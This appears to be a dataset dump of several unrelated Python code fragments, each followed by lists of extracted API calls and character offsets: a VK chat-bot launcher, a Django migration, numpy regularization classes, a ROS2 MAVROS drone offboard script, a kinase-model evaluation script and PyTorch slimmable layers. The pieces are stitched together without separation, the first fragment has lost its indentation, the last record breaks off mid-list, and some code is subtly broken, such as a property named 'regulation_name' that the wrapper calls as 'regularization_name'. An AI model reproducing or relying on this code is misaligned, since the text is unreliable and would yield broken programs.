sys.stdout.encoding = 'UTF-8'
login = config.get('login.login')
password = config.get('login.password')
storage.init(accounts.getFile('storage.db'))
def availableScripts():
print('Available scripts:', ', '.join(sorted(i[:-3] for i in os.listdir('scripts') if i.endswith('.py') and not i.startswith('__'))))
if args['script'] is None:
availableScripts()
sys.exit()
if args['script']:
if not args['script'].replace('_', '').isalpha():
print('Invalid script')
availableScripts()
sys.exit()
if args['master']:
if runInMaster(args['script'].lower(), args['args']):
sys.exit()
logging.warning('Failed to run script in master')
v = createVkApi(login, password)
try:
runScript(args['script'].lower(), args['args'], v)
except ImportError:
print('Invalid script')
availableScripts()
sys.exit(1)
sys.exit()
logging.info('Starting vkbot, pid ' + str(os.getpid()))
| [
"logging.getLogger",
"log.warning",
"os.listdir",
"config.get",
"log.error",
"codecs.getwriter",
"accounts.init",
"log.info",
"logging.warning",
"sys.stdout.detach",
"os.path.realpath",
"log.debug",
"vkbot.createVkApi",
"os.getpid",
"sys.exit",
"html.escape",
"accounts.getFile"
] | [((326, 341), 'accounts.init', 'accounts.init', ([], {}), '()\n', (339, 341), False, 'import accounts\n'), ((1387, 1432), 'config.get', 'config.get', (['"""vkbot.suppress_chat_stderr"""', '"""b"""'], {}), "('vkbot.suppress_chat_stderr', 'b')\n", (1397, 1432), False, 'import config\n'), ((1630, 1655), 'config.get', 'config.get', (['"""login.login"""'], {}), "('login.login')\n", (1640, 1655), False, 'import config\n'), ((1667, 1695), 'config.get', 'config.get', (['"""login.password"""'], {}), "('login.password')\n", (1677, 1695), False, 'import config\n'), ((1545, 1570), 'codecs.getwriter', 'codecs.getwriter', (['"""utf-8"""'], {}), "('utf-8')\n", (1561, 1570), False, 'import codecs\n'), ((1571, 1590), 'sys.stdout.detach', 'sys.stdout.detach', ([], {}), '()\n', (1588, 1590), False, 'import sys\n'), ((1710, 1740), 'accounts.getFile', 'accounts.getFile', (['"""storage.db"""'], {}), "('storage.db')\n", (1726, 1740), False, 'import accounts\n'), ((1960, 1970), 'sys.exit', 'sys.exit', ([], {}), '()\n', (1968, 1970), False, 'import sys\n'), ((2297, 2325), 'vkbot.createVkApi', 'createVkApi', (['login', 'password'], {}), '(login, password)\n', (2308, 2325), False, 'from vkbot import createVkApi\n'), ((2501, 2511), 'sys.exit', 'sys.exit', ([], {}), '()\n', (2509, 2511), False, 'import sys\n'), ((294, 323), 'os.path.realpath', 'os.path.realpath', (['sys.argv[0]'], {}), '(sys.argv[0])\n', (310, 323), False, 'import os\n'), ((1214, 1243), 'logging.getLogger', 'logging.getLogger', (['"""antigate"""'], {}), "('antigate')\n", (1231, 1243), False, 'import logging\n'), ((1271, 1300), 'logging.getLogger', 'logging.getLogger', (['"""requests"""'], {}), "('requests')\n", (1288, 1300), False, 'import logging\n'), ((1328, 1356), 'logging.getLogger', 'logging.getLogger', (['"""asyncio"""'], {}), "('asyncio')\n", (1345, 1356), False, 'import logging\n'), ((2112, 2122), 'sys.exit', 'sys.exit', ([], {}), '()\n', (2120, 2122), False, 'import sys\n'), ((2239, 2288), 'logging.warning', 'logging.warning', (['"""Failed to run script in master"""'], {}), "('Failed to run script in master')\n", (2254, 2288), False, 'import logging\n'), ((866, 892), 'log.error', 'log.error', (['msg'], {'fatal': '(True)'}), '(msg, fatal=True)\n', (875, 892), False, 'import log\n'), ((1438, 1466), 'logging.getLogger', 'logging.getLogger', (['"""chatlog"""'], {}), "('chatlog')\n", (1455, 1466), False, 'import logging\n'), ((2220, 2230), 'sys.exit', 'sys.exit', ([], {}), '()\n', (2228, 2230), False, 'import sys\n'), ((2485, 2496), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (2493, 2496), False, 'import sys\n'), ((2556, 2567), 'os.getpid', 'os.getpid', ([], {}), '()\n', (2565, 2567), False, 'import os\n'), ((934, 977), 'log.error', 'log.error', (['msg', '(record.exc_info is not None)'], {}), '(msg, record.exc_info is not None)\n', (943, 977), False, 'import log\n'), ((675, 691), 'html.escape', 'html.escape', (['msg'], {}), '(msg)\n', (686, 691), False, 'import html\n'), ((1021, 1037), 'log.warning', 'log.warning', (['msg'], {}), '(msg)\n', (1032, 1037), False, 'import log\n'), ((1078, 1091), 'log.info', 'log.info', (['msg'], {}), '(msg)\n', (1086, 1091), False, 'import log\n'), ((1832, 1853), 'os.listdir', 'os.listdir', (['"""scripts"""'], {}), "('scripts')\n", (1842, 1853), False, 'import os\n'), ((1133, 1147), 'log.debug', 'log.debug', (['msg'], {}), '(msg)\n', (1142, 1147), False, 'import log\n')] |
from django.db import transaction
from api.management.data_script import OperationalDataScript
from api.models.signing_authority_assertion import SigningAuthorityAssertion
class UpdateSigningAuthorityAssertions(OperationalDataScript):
"""
Update the assertions for the compliance report
"""
is_revertable = False
comment = 'Update the assertions for the compliance report'
def check_run_preconditions(self):
return True
def update_assertions(self):
text = "I confirm this consumer ZEV sales information is complete and correct."
assertion = SigningAuthorityAssertion.objects.get(
module="consumer_sales")
assertion.description = text
assertion.save()
@transaction.atomic
def run(self):
self.update_assertions()
script_class = UpdateSigningAuthorityAssertions
| [
"api.models.signing_authority_assertion.SigningAuthorityAssertion.objects.get"
] | [((598, 660), 'api.models.signing_authority_assertion.SigningAuthorityAssertion.objects.get', 'SigningAuthorityAssertion.objects.get', ([], {'module': '"""consumer_sales"""'}), "(module='consumer_sales')\n", (635, 660), False, 'from api.models.signing_authority_assertion import SigningAuthorityAssertion\n')] |
# -*- coding: utf-8 -*-
import numpy as np
# Note: careful as np.multiply does an elementwise multiply on numpy arrays
# asterisk (*) does the same but will perfom matrix multiplication on mat (numpy matrices)
class L1Regularization:
"""
**Lasso Regression (L1Regularization)**
L1Regularization adds sum of the absolute value magnitudes of parameters as
penalty term to the loss function
References:
[1] Regularization (mathematics)
* [Wikipedia Article] https://en.wikipedia.org/wiki/Regularization_(mathematics)
[2] Regression shrinkage and selection via the lasso
* [R Tibshirani, 1996] https://goo.gl/Yh9bBU
* [PDF] https://goo.gl/mQP5mA
[3] Feature selection, L1 vs. L2 regularization, and rotational invariance
* [<NAME>, ] [PDF] https://goo.gl/rbwNCt
Args:
_lambda (float32): controls the weight of the penalty term
"""
def __init__(self, _lambda, **kwargs):
self._lambda = _lambda
def regulate(self, weights):
return np.multiply(self._lambda, np.linalg.norm(weights))
def derivative(self, weights):
return np.multiply(self._lambda, np.sign(weights))
@property
def regulation_name(self):
return self.__class__.__name__
class L2Regularization:
"""
**Lasso Regression (L2Regularization)**
L1Regularization adds sum of the squared magnitudes of parameters as penalty
term to the loss function
References:
[1] Regularization (mathematics)
* [Wikipedia Article] https://en.wikipedia.org/wiki/Regularization_(mathematics)
[2] Regression shrinkage and selection via the lasso
* [R Tibshirani, 1996] https://goo.gl/Yh9bBU
* [PDF] https://goo.gl/mQP5mA
[3] Feature selection, L1 vs. L2 regularization, and rotational invariance
* [<NAME>. Ng, ] [PDF] https://goo.gl/rbwNCt
Args:
_lambda (float32): controls the weight of the penalty term
"""
def __init__(self, _lambda, **kwargs):
self._lambda = _lambda
def regulate(self, weights):
return np.multiply(self._lambda, (0.5 * weights.T.dot(weights)))
def derivative(self, weights):
return np.multiply(self._lambda, weights)
@property
def regulation_name(self):
return self.__class__.__name__
class ElasticNetRegularization:
"""
**Elastic Net Regularization (ElasticNetRegularization)**
ElasticNetRegularization adds both absolute value of magnitude and squared
magnitude of coefficient as penalty term to the loss function
References:
[1] Regularization (mathematics)
* [Wikipedia Article] https://en.wikipedia.org/wiki/Regularization_(mathematics)
Args:
_lambda (float32): controls the weight of the penalty term
l1_ratio (float32): controls the value l1 penalty as a ratio of total penalty added to the loss function
"""
def __init__(self, _lambda, l1_ratio):
self._lambda = _lambda
self.l1_ratio = l1_ratio
def regulate(self, weights):
return np.multiply(self._lambda, (((self.l1_ratio * 0.5) * weights.T.dot(weights)) + ((1 - self.l1_ratio) * np.linalg.norm(weights))))
def derivative(self, weights):
return np.multiply(self._lambda, (((self.l1_ratio * 0.5) * weights) + ((1 - self.l1_ratio) * np.sign(weights))))
@property
def regulation_name(self):
return self.__class__.__name__
class RegularizationFunction:
_regularizers = {
'l1' : L1Regularization,
'lasso' : L1Regularization,
'l2' : L2Regularization,
'ridge' : L2Regularization,
'elastic' : ElasticNetRegularization,
'elastic_net' : ElasticNetRegularization
}
def __init__(self, name = 'lasso', _lambda = 0.5, l1_ratio = 0.5):
if name not in self._regularizers.keys():
raise Exception('Regularization function must be either one of the following: {}.'.format(', '.join(self._regularizers.keys())))
self.regularization_func = self._regularizers[name](_lambda, l1_ratio = l1_ratio)
@property
def name(self):
return self.regularization_func.regularization_name
def regulate(self, weights):
return self.regularization_func.regulate(weights)
def derivative(self, weights):
return self.regularization_func.derivative(weights)
| [
"numpy.multiply",
"numpy.sign",
"numpy.linalg.norm"
] | [((2270, 2304), 'numpy.multiply', 'np.multiply', (['self._lambda', 'weights'], {}), '(self._lambda, weights)\n', (2281, 2304), True, 'import numpy as np\n'), ((1102, 1125), 'numpy.linalg.norm', 'np.linalg.norm', (['weights'], {}), '(weights)\n', (1116, 1125), True, 'import numpy as np\n'), ((1204, 1220), 'numpy.sign', 'np.sign', (['weights'], {}), '(weights)\n', (1211, 1220), True, 'import numpy as np\n'), ((3253, 3276), 'numpy.linalg.norm', 'np.linalg.norm', (['weights'], {}), '(weights)\n', (3267, 3276), True, 'import numpy as np\n'), ((3418, 3434), 'numpy.sign', 'np.sign', (['weights'], {}), '(weights)\n', (3425, 3434), True, 'import numpy as np\n')] |
#!/usr/bin/env python3
import rclpy
from rclpy.node import Node
from rclpy.callback_groups import ReentrantCallbackGroup
from rclpy.clock import Duration
from rclpy.executors import MultiThreadedExecutor
from geometry_msgs.msg import PoseStamped, Point
from mavros_msgs.srv import CommandBool, SetMode
from mavros_msgs.msg import State
from mavros import Client
class MavrosClient(Client):
def __init__(self):
super().__init__("ex_mavros", "drone_0/mavros")
self.current_state = State()
self.system.subscribe_state(self._cb_state)
self.pub_setpoint_local = self.setpoint_position.pub_local
self.cli_arming = self.command.cli_arming
self.cli_set_mode = self.system.cli_set_mode
def _cb_state(self, msg: State):
self.current_state = msg
def main(args=None):
rclpy.init(args=args)
ex = MavrosClient()
executor = MultiThreadedExecutor()
# Setpoint publishing rate must be faster than 2 Hz
rate = ex.create_rate(20.0) # FIXEME: rate locks up ros when sleep is called
# Wait for connection
while rclpy.ok() and not ex.current_state.connected:
rclpy.spin_once(ex)
ex.get_logger().info("Trying to connect", throttle_duration_sec=2.0)
# rate.sleep()
ex.get_logger().info("Connected!")
pose = PoseStamped()
pose.pose.position = Point(x=0.0, y=0.0, z=2.0)
# Send a few setpoints before starting
i = 100
while rclpy.ok() and i > 0:
ex.pub_setpoint_local.publish(pose)
rclpy.spin_once(ex)
ex.get_logger().info("Sending initial setpoints", throttle_duration_sec=2.0)
# rate.sleep()
i -= 1
offb_set_mode = SetMode.Request()
offb_set_mode.custom_mode = "OFFBOARD" # px4_cmode_map in uas_stringify.cpp
arm_cmd = CommandBool.Request()
arm_cmd.value = True
last_request = ex.get_clock().now()
while rclpy.ok():
if ex.current_state.mode != "OFFBOARD" and ex.get_clock().now() - last_request > Duration(seconds=5.0):
ex.get_logger().info("Sending offboard mode")
res = ex.cli_set_mode.call(offb_set_mode)
ex.get_logger().info("sent offboard")
# if req := ex.cli_set_mode.call(offb_set_mode) and res.mode_sent:
if res.mode_sent:
ex.get_logger().info("Offboard enabled")
last_request = ex.get_clock().now()
else:
if not ex.current_state.armed and ex.get_clock().now() - last_request > Duration(seconds=5.0):
ex.get_logger().info("Sending arm")
if ex.cli_arming.call(arm_cmd) and arm_cmd.response.success:
ex.get_logger().info("Vehicle armed")
last_request = ex.get_clock().now()
ex.pub_setpoint_local.publish(pose)
rclpy.spin_once(ex, executor=executor)
ex.get_logger().info("Publishing setpoint", throttle_duration_sec=2.0)
# rate.sleep()
if __name__=="__main__":
main()
| [
"rclpy.ok",
"rclpy.executors.MultiThreadedExecutor",
"mavros_msgs.msg.State",
"mavros_msgs.srv.CommandBool.Request",
"rclpy.clock.Duration",
"mavros_msgs.srv.SetMode.Request",
"geometry_msgs.msg.Point",
"geometry_msgs.msg.PoseStamped",
"rclpy.spin_once",
"rclpy.init"
] | [((833, 854), 'rclpy.init', 'rclpy.init', ([], {'args': 'args'}), '(args=args)\n', (843, 854), False, 'import rclpy\n'), ((894, 917), 'rclpy.executors.MultiThreadedExecutor', 'MultiThreadedExecutor', ([], {}), '()\n', (915, 917), False, 'from rclpy.executors import MultiThreadedExecutor\n'), ((1317, 1330), 'geometry_msgs.msg.PoseStamped', 'PoseStamped', ([], {}), '()\n', (1328, 1330), False, 'from geometry_msgs.msg import PoseStamped, Point\n'), ((1356, 1382), 'geometry_msgs.msg.Point', 'Point', ([], {'x': '(0.0)', 'y': '(0.0)', 'z': '(2.0)'}), '(x=0.0, y=0.0, z=2.0)\n', (1361, 1382), False, 'from geometry_msgs.msg import PoseStamped, Point\n'), ((1685, 1702), 'mavros_msgs.srv.SetMode.Request', 'SetMode.Request', ([], {}), '()\n', (1700, 1702), False, 'from mavros_msgs.srv import CommandBool, SetMode\n'), ((1798, 1819), 'mavros_msgs.srv.CommandBool.Request', 'CommandBool.Request', ([], {}), '()\n', (1817, 1819), False, 'from mavros_msgs.srv import CommandBool, SetMode\n'), ((1895, 1905), 'rclpy.ok', 'rclpy.ok', ([], {}), '()\n', (1903, 1905), False, 'import rclpy\n'), ((505, 512), 'mavros_msgs.msg.State', 'State', ([], {}), '()\n', (510, 512), False, 'from mavros_msgs.msg import State\n'), ((1092, 1102), 'rclpy.ok', 'rclpy.ok', ([], {}), '()\n', (1100, 1102), False, 'import rclpy\n'), ((1147, 1166), 'rclpy.spin_once', 'rclpy.spin_once', (['ex'], {}), '(ex)\n', (1162, 1166), False, 'import rclpy\n'), ((1448, 1458), 'rclpy.ok', 'rclpy.ok', ([], {}), '()\n', (1456, 1458), False, 'import rclpy\n'), ((1522, 1541), 'rclpy.spin_once', 'rclpy.spin_once', (['ex'], {}), '(ex)\n', (1537, 1541), False, 'import rclpy\n'), ((2807, 2845), 'rclpy.spin_once', 'rclpy.spin_once', (['ex'], {'executor': 'executor'}), '(ex, executor=executor)\n', (2822, 2845), False, 'import rclpy\n'), ((1996, 2017), 'rclpy.clock.Duration', 'Duration', ([], {'seconds': '(5.0)'}), '(seconds=5.0)\n', (2004, 2017), False, 'from rclpy.clock import Duration\n'), ((2493, 2514), 'rclpy.clock.Duration', 'Duration', ([], {'seconds': '(5.0)'}), '(seconds=5.0)\n', (2501, 2514), False, 'from rclpy.clock import Duration\n')] |
#!/home/ssericksen/anaconda2/bin/python2.7
# evaluate F1 and MCC metrics on new targets. Assume 10% hit fractions,
# and predict top 10% of cpds by score as the actives
import numpy as np
import pandas as pd
import informer_functions as inf
import sklearn as sk
import sys
try:
matrix = sys.argv[1] # 1 or 2
targ = sys.argv[2] # pknb, bglf4, or rop18
except:
print('')
print(' eval_rocauc_newtarg.py matrix targ')
print('')
print(' 1 or 2 pknb, bglf4, or rop18')
print('')
exit
rankings_file = '../output_newtargs/pkis'+matrix+'_'+targ+'_model_rankings_v1.2.csv'
activity_matrix_file = '../data/data_newtargs_pkis'+matrix+'cpds.csv'
df_continuous = pd.read_csv( activity_matrix_file, index_col='molid')
df_binary = inf.get_binary( df_continuous )
df_binary.index = df_binary.index.map(str)
df_rankings = pd.read_csv( rankings_file, index_col='molid' )
df_rankings.index = df_rankings.index.map(str)
df_rankings.replace('informer', -1000.0, inplace=True)
print('model,inf_hits,hits_recovered,tot_hits,F1,MCC')
for model in df_rankings.columns:
if df_rankings[model].count() < 300:
print("model:{} and target:{} missing significant portion of scored cpds, skipping metric eval".format(model,targ))
s_labels = df_binary[targ].rename('labels')
s_rankings = df_rankings[model].astype(float).rename('scores')
df_temp = pd.concat( [s_labels, s_rankings], axis=1, sort=False )
inf_hits = df_temp[ df_temp['scores'] == -1000.0 ]['labels'].sum()
tot_hits = df_temp['labels'].sum()
hits_recovered = np.nan
f1 = np.nan
mcc = np.nan
else:
s_labels = df_binary[targ].rename('labels')
s_rankings = df_rankings[model].astype(float).rename('scores')
df_temp = pd.concat( [s_labels, s_rankings], axis=1, sort=False )
# do not count negative informers as false positives
df_temp = df_temp[ ~((df_temp['scores'] == -1000.0) & (df_temp['labels'] == False)) ]
df_temp = df_temp.dropna( how='any')
# predict the top 10% ranking cpds as "active"
df_temp['binary_predictions'] = df_temp['scores'] <= df_temp['scores'].quantile(0.10)
predictions_arr = df_temp['binary_predictions'].values
labels_arr = df_temp['labels'].values
tot_hits = labels_arr.sum()
inf_hits = df_temp[ df_temp['scores'] == -1000.0 ]['labels'].sum()
f1 = sk.metrics.f1_score( labels_arr, predictions_arr )
mcc = sk.metrics.matthews_corrcoef( labels_arr, predictions_arr )
# so with truncated dataset (with negative informers removed), how many cpds in 10% of dataset?
N = int( round( len(df_temp) * 0.10 ) )
hits_recovered = df_temp.sort_values('scores').head( N )['labels'].sum()
print('{},{},{},{},{},{}').format( model, inf_hits, hits_recovered, tot_hits, f1, mcc )
| [
"sklearn.metrics.f1_score",
"pandas.read_csv",
"pandas.concat",
"informer_functions.get_binary",
"sklearn.metrics.matthews_corrcoef"
] | [((717, 769), 'pandas.read_csv', 'pd.read_csv', (['activity_matrix_file'], {'index_col': '"""molid"""'}), "(activity_matrix_file, index_col='molid')\n", (728, 769), True, 'import pandas as pd\n'), ((783, 812), 'informer_functions.get_binary', 'inf.get_binary', (['df_continuous'], {}), '(df_continuous)\n', (797, 812), True, 'import informer_functions as inf\n'), ((873, 918), 'pandas.read_csv', 'pd.read_csv', (['rankings_file'], {'index_col': '"""molid"""'}), "(rankings_file, index_col='molid')\n", (884, 918), True, 'import pandas as pd\n'), ((1419, 1472), 'pandas.concat', 'pd.concat', (['[s_labels, s_rankings]'], {'axis': '(1)', 'sort': '(False)'}), '([s_labels, s_rankings], axis=1, sort=False)\n', (1428, 1472), True, 'import pandas as pd\n'), ((1818, 1871), 'pandas.concat', 'pd.concat', (['[s_labels, s_rankings]'], {'axis': '(1)', 'sort': '(False)'}), '([s_labels, s_rankings], axis=1, sort=False)\n', (1827, 1871), True, 'import pandas as pd\n'), ((2456, 2504), 'sklearn.metrics.f1_score', 'sk.metrics.f1_score', (['labels_arr', 'predictions_arr'], {}), '(labels_arr, predictions_arr)\n', (2475, 2504), True, 'import sklearn as sk\n'), ((2521, 2578), 'sklearn.metrics.matthews_corrcoef', 'sk.metrics.matthews_corrcoef', (['labels_arr', 'predictions_arr'], {}), '(labels_arr, predictions_arr)\n', (2549, 2578), True, 'import sklearn as sk\n')] |
"""
Ref: https://github.com/htwang14/CAT/blob/1152f7095d6ea0026c7344b00fefb9f4990444f2/models/FiLM.py#L35
"""
import numpy as np
import torch.nn as nn
from torch.nn import functional as F
from torch.nn.modules.batchnorm import _BatchNorm
class SwitchableLayer1D(nn.Module):
"""1-dimensional switchable layer.
The 1D means the module only requires one dimension variable, like BN.
Args:
module_class (nn.Module): Should a module class which takes `num_features`
as the first arg, and multiple kwargs.
"""
def __init__(self, module_class, max_num_features: int, slim_ratios: list, **kwargs):
super(SwitchableLayer1D, self).__init__()
self.max_num_features = max_num_features
modules = []
slim_ratios = sorted(slim_ratios)
for r in slim_ratios:
w = int(np.ceil(r * max_num_features))
modules.append(module_class(w, **kwargs))
self._switch_modules = nn.ModuleList(modules)
self.current_module_idx = -1
self._slim_ratio = max(slim_ratios)
self.slim_ratios = slim_ratios
self.ignore_model_profiling = True
@property
def slim_ratio(self):
return self._slim_ratio
@slim_ratio.setter
def slim_ratio(self, r):
self.current_module_idx = self.slim_ratios.index(r)
self._slim_ratio = r
def forward(self, x):
y = self._switch_modules[self.current_module_idx](x)
return y
class SlimmableOpMixin(object):
def mix_forward(self, x, mix_num=-1):
if mix_num < 0:
mix_num = int(1/self.slim_ratio)
elif mix_num == 0:
print("WARNING: not mix anything.")
out = 0.
for shift_idx in range(0, mix_num):
out = out + self._forward_with_partial_weight(x, shift_idx)
return out * 1. / mix_num
def _forward_with_partial_weight(self, x, slim_bias_idx, out_slim_bias_idx=None):
raise NotImplementedError()
def _compute_slice_bound(self, in_channels, out_channels, slim_bias_idx, out_slim_bias_idx=None):
out_slim_bias_idx = slim_bias_idx if out_slim_bias_idx is None else out_slim_bias_idx
out_idx_bias = out_channels * out_slim_bias_idx if not self.non_slimmable_out else 0
in_idx_bias = in_channels * slim_bias_idx if not self.non_slimmable_in else 0
return out_idx_bias, (out_idx_bias+out_channels), in_idx_bias, (in_idx_bias+in_channels)
class _SlimmableBatchNorm(_BatchNorm, SlimmableOpMixin):
"""
BatchNorm2d shared by all sub-networks in slimmable network.
This won't work according to slimmable net paper.
See implementation in https://github.com/htwang14/CAT/blob/1152f7095d6ea0026c7344b00fefb9f4990444f2/models/slimmable_ops.py#L28
If this is used, we will enforce the tracking to be disabled.
Following https://github.com/dem123456789/HeteroFL-Computation-and-Communication-Efficient-Federated-Learning-for-Heterogeneous-Clients
"""
def __init__(self, num_features, eps=1e-5, momentum=None, affine=True,
track_running_stats=False, non_slimmable=False):
assert not track_running_stats, "You should not track stats which cannot be slimmable."
# if track_running_stats:
# assert non_slimmable
super(_SlimmableBatchNorm, self).__init__(num_features, momentum=momentum, track_running_stats=False, affine=affine, eps=eps)
self.max_num_features = num_features
self._slim_ratio = 1.0
self.slim_bias_idx = 0
self.out_slim_bias_idx = None
self.non_slimmable = non_slimmable
self.mix_forward_num = 1 # 1 means not mix; -1 mix all
@property
def slim_ratio(self):
return self._slim_ratio
@slim_ratio.setter
def slim_ratio(self, r):
self.num_features = self._compute_channels(r)
self._slim_ratio = r
if r < 0 and self.track_running_stats:
raise RuntimeError(f"Try to track state when slim_ratio < 1 is {r}")
def _compute_channels(self, ratio):
return self.max_num_features if self.non_slimmable \
else int(np.ceil(self.max_num_features * ratio))
def forward(self, x):
if self.mix_forward_num == 1:
return self._forward_with_partial_weight(x, self.slim_bias_idx, self.out_slim_bias_idx)
else:
return self.mix_forward(x, mix_num=self.mix_forward_num)
def _forward_with_partial_weight(self, input, slim_bias_idx, out_slim_bias_idx=None):
out_idx0, out_idx1 = self._compute_slice_bound(self.num_features, slim_bias_idx)
weight = self.weight[out_idx0:out_idx1]
bias = self.bias[out_idx0:out_idx1]
# ----- copy from parent implementation ----
self._check_input_dim(input)
# exponential_average_factor is set to self.momentum
# (when it is available) only so that it gets updated
# in ONNX graph when this node is exported to ONNX.
if self.momentum is None:
exponential_average_factor = 0.0
else:
exponential_average_factor = self.momentum
if self.training and self.track_running_stats:
# TODO: if statement only here to tell the jit to skip emitting this when it is None
if self.num_batches_tracked is not None:
self.num_batches_tracked = self.num_batches_tracked + 1
if self.momentum is None: # use cumulative moving average
exponential_average_factor = 1.0 / float(self.num_batches_tracked)
else: # use exponential moving average
exponential_average_factor = self.momentum
r"""
Decide whether the mini-batch stats should be used for normalization rather than the buffers.
Mini-batch stats are used in training mode, and in eval mode when buffers are None.
"""
if self.training:
bn_training = True
else:
bn_training = (self.running_mean is None) and (self.running_var is None)
r"""
Buffers are only updated if they are to be tracked and we are in training mode. Thus they only need to be
passed when the update should occur (i.e. in training mode when they are tracked), or when buffer stats are
used for normalization (i.e. in eval mode when buffers are not None).
"""
return F.batch_norm(
input,
# If buffers are not to be tracked, ensure that they won't be updated
self.running_mean if not self.training or self.track_running_stats else None,
self.running_var if not self.training or self.track_running_stats else None,
weight, bias, bn_training, exponential_average_factor, self.eps)
def _compute_slice_bound(self, channels, slim_bias_idx):
idx_bias = channels * slim_bias_idx if not self.non_slimmable else 0
return idx_bias, (idx_bias+channels)
def _save_to_state_dict(self, destination, prefix, keep_vars):
for name, param in self._parameters.items():
if param is not None:
# ------------------------------
idx_bias = self.num_features * self.slim_bias_idx if not self.non_slimmable else 0
if name == 'weight':
param = param[idx_bias:(idx_bias + self.num_features)]
elif name == 'bias' and param is not None:
param = param[idx_bias:(idx_bias + self.num_features)]
# ------------------------------
destination[prefix + name] = param if keep_vars else param.detach()
for name, buf in self._buffers.items():
if buf is not None and name not in self._non_persistent_buffers_set:
destination[prefix + name] = buf if keep_vars else buf.detach()
class SlimmableBatchNorm2d(_SlimmableBatchNorm):
def _check_input_dim(self, input):
if input.dim() != 4:
raise ValueError('expected 4D input (got {}D input)'
.format(input.dim()))
class SlimmableBatchNorm1d(_SlimmableBatchNorm):
def _check_input_dim(self, input):
if input.dim() != 2 and input.dim() != 3:
raise ValueError('expected 2D or 3D input (got {}D input)'
.format(input.dim()))
class SlimmableConv2d(nn.Conv2d, SlimmableOpMixin):
"""
Args:
non_slimmable_in: Fix the in size
non_slimmable_out: Fix the out size
"""
def __init__(self, in_channels: int, out_channels: int,
kernel_size, stride=1, padding=0, dilation=1,
groups=1, bias=True,
non_slimmable_out=False, non_slimmable_in=False,):
super(SlimmableConv2d, self).__init__(
in_channels, out_channels,
kernel_size, stride=stride, padding=padding, dilation=dilation,
groups=groups, bias=bias)
assert groups == 1, "for now, we can only support single group when slimming."
assert in_channels > 0
assert out_channels > 0
self.max_in_channels = in_channels
self.max_out_channels = out_channels
self._slim_ratio = 1.0
self.slim_bias_idx = 0 # input slim bias idx
self.out_slim_bias_idx = None # -1: use the same value as slim_bias_idx
self.non_slimmable_out = non_slimmable_out
self.non_slimmable_in = non_slimmable_in
self.mix_forward_num = -1
@property
def slim_ratio(self):
return self._slim_ratio
@slim_ratio.setter
def slim_ratio(self, r):
self.in_channels, self.out_channels = self._compute_channels(r)
self._slim_ratio = r
def _compute_channels(self, ratio):
in_channels = self.max_in_channels if self.non_slimmable_in \
else int(np.ceil(self.max_in_channels * ratio))
out_channels = self.max_out_channels if self.non_slimmable_out \
else int(np.ceil(self.max_out_channels * ratio))
return in_channels, out_channels
def forward(self, x):
if self.mix_forward_num == 1:
return self._forward_with_partial_weight(x, self.slim_bias_idx, self.out_slim_bias_idx)
else:
return self.mix_forward(x, mix_num=self.mix_forward_num)
def _forward_with_partial_weight(self, x, slim_bias_idx, out_slim_bias_idx=None):
out_idx0, out_idx1, in_idx0, in_idx1 = self._compute_slice_bound(
self.in_channels, self.out_channels, slim_bias_idx, out_slim_bias_idx)
weight = self.weight[out_idx0:out_idx1, in_idx0:in_idx1]
bias = self.bias[out_idx0:out_idx1] if self.bias is not None else None
y = F.conv2d(
x, weight, bias, self.stride, self.padding,
self.dilation, self.groups)
return y / self.slim_ratio if self.training and not self.non_slimmable_out else y
def _save_to_state_dict(self, destination, prefix, keep_vars):
for name, param in self._parameters.items():
if param is not None:
# ------------------------------
out_idx_bias = self.out_channels * self.slim_bias_idx if not self.non_slimmable_out else 0
if name == 'weight':
in_idx_bias = self.in_channels * self.slim_bias_idx \
if not self.non_slimmable_in else 0
param = param[out_idx_bias:(out_idx_bias+self.out_channels),
in_idx_bias:(in_idx_bias+self.in_channels)]
elif name == 'bias' and param is not None:
param = param[out_idx_bias:(out_idx_bias + self.out_channels)]
# ------------------------------
destination[prefix + name] = param if keep_vars else param.detach()
for name, buf in self._buffers.items():
if buf is not None and name not in self._non_persistent_buffers_set:
destination[prefix + name] = buf if keep_vars else buf.detach()
class SlimmableLinear(nn.Linear, SlimmableOpMixin):
"""
Args:
non_slimmable_in: Fix the in size
non_slimmable_out: Fix the out size
"""
def __init__(self, in_features: int, out_features: int, bias=True,
non_slimmable_out=False, non_slimmable_in=False,):
super(SlimmableLinear, self).__init__(in_features, out_features, bias=bias)
self.max_in_features = in_features
self.max_out_features = out_features
self._slim_ratio = 1.0
self.slim_bias_idx = 0 # input slim bias idx
self.out_slim_bias_idx = None # -1: use the same value as slim_bias_idx
self.non_slimmable_out = non_slimmable_out
self.non_slimmable_in = non_slimmable_in
self.mix_forward_num = -1
@property
def slim_ratio(self):
return self._slim_ratio
@slim_ratio.setter
def slim_ratio(self, r):
self.in_features, self.out_features = self._compute_channels(r)
self._slim_ratio = r
def _compute_channels(self, ratio):
in_features = self.max_in_features if self.non_slimmable_in \
else int(np.ceil(self.max_in_features * ratio))
out_features = self.max_out_features if self.non_slimmable_out \
else int(np.ceil(self.max_out_features * ratio))
return in_features, out_features
def forward(self, x):
if self.mix_forward_num == 1:
return self._forward_with_partial_weight(x, self.slim_bias_idx, self.out_slim_bias_idx)
else:
return self.mix_forward(x, mix_num=self.mix_forward_num)
def _forward_with_partial_weight(self, x, slim_bias_idx, out_slim_bias_idx=None):
out_idx0, out_idx1, in_idx0, in_idx1 = self._compute_slice_bound(
self.in_features, self.out_features, slim_bias_idx, out_slim_bias_idx)
weight = self.weight[out_idx0:out_idx1, in_idx0:in_idx1]
bias = self.bias[out_idx0:out_idx1] if self.bias is not None else None
out = F.linear(x, weight, bias)
return out / self.slim_ratio if self.training and not self.non_slimmable_out else out
def _save_to_state_dict(self, destination, prefix, keep_vars):
for name, param in self._parameters.items():
if param is not None:
# ------------------------------
param = self.get_slim_param(name, param)
# ------------------------------
destination[prefix + name] = param if keep_vars else param.detach()
for name, buf in self._buffers.items():
if buf is not None and name not in self._non_persistent_buffers_set:
destination[prefix + name] = buf if keep_vars else buf.detach()
def get_slim_param(self, name, param):
out_idx_bias = self.out_features * self.slim_bias_idx if not self.non_slimmable_out else 0
if name == 'weight':
in_idx_bias = self.in_features * self.slim_bias_idx if not self.non_slimmable_in else 0
param = param[out_idx_bias:(out_idx_bias + self.out_features),
in_idx_bias:(in_idx_bias + self.in_features)]
elif name == 'bias' and param is not None:
param = param[out_idx_bias:(out_idx_bias + self.out_features)]
return param
| [
"torch.nn.functional.linear",
"torch.nn.functional.conv2d",
"numpy.ceil",
"torch.nn.ModuleList",
"torch.nn.functional.batch_norm"
